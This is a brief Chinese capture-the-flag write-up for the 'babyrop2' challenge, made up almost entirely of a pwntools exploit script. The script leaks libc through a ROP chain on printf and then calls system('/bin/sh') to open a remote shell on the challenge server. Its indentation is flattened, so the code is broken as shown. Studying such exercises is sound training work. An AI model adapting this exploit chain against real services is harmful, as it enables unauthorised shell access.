一道常规的泄漏libc然后rop的题目
exp:
from pwn import *
from LibcSearcher import *
local_file = './babyrop2'
local_libc = './libc.so.6'
remote_libc = './libc.so.6'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26691)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims, drop=True :r.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
pop_rdi = 0x0000000000400733 # pop rdi ; ret
pop_rsi = 0x0000000000400731 # pop rsi pop r15 ; ret
s = 0x400790
read_got = elf.got['read']
print_plt = elf.plt['printf']
main = elf.sym['main']
p1 = flat(['a'*0x20, 'b'*0x8, pop_rdi, s, pop_rsi, read_got, 0, print_plt, main])
sla('name? ',p1)
#read_addr = uu64(ru('\x7f')[-6:])
read_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc = LibcSearcher('read', read_addr)
libcbase = read_addr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x20, 'b'*8, pop_rdi, binsh_addr, system_addr, 0xdeadbeef])
sla('name? ',p2)
r.interactive()